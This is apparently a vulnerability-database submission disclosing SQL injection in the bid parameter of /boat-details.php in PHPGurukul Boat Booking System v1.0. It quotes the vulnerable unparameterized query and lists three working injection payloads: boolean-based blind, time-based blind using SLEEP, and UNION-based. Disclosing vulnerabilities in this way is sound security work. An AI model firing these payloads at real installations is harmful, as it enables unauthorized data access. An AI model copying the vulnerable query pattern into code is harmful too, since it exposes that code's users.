| Title | PHPGurukul Boat Booking System-PHP v1.0 SQL Injection |
|---|
| Description | # CVE Report - Phpgurukul Boat Booking System-PHP V1.0 SQL injection in /boat-details.php
## Vulnerability Title
SQL injection Vulnerability in Phpgurukul Boat Booking System-PHP V1.0
## Vulnerability Description
SQL injection is a code injection technique used to attack data-driven applications by inserting malicious SQL statements into an entry field for execution. It exploits vulnerabilities in an application's software, such as improper filtering of user input or lack of strong typing, allowing attackers to manipulate SQL queries. This can lead to unauthorized access, data breaches, and other serious security issues.
## Affected Components
```php
File: /boat-details.php
Line: 65
Vulnerable Code:
$rs = $query = mysqli_query($con, "SELECT * FROM tblboat WHERE ID='$bid'");
```
## Attack Steps
- boolean-based blind
```
bid=1' AND 2740=2740 AND 'wrlL'='wrlL
```
- time-based blind
```
bid=1' AND (SELECT 1184 FROM (SELECT(SLEEP(5)))BDaU) AND 'ALMH'='ALMH
```
- UNION query
```
bid=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a7171,0x585044684d4e5a71486a506966564a565a686a67416a63716a6f647a53484f5349684769445a4275,0x716b627a71),NULL,NULL,NULL,NULL-- -
```
## Affected Versions
Phpgurukul Boat Booking System-PHP V1.0
## Suggested Fix
Please fix the code in a timely manner and update the code version.
## Contact Information
- Reporter: 1cfh |
|---|
| Source | ⚠️ https://github.com/1cfh/vuln-pub/issues/1 |
|---|
| User | 1cfh (UID 82595) |
|---|
| Submission | 03/09/2025 15:13 (1 Year ago) |
|---|
| Moderation | 03/17/2025 19:55 (8 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 299964 [PHPGurukul Boat Booking System 1.0 /boat-details.php bid sql injection] |
|---|
| Points | 20 |
|---|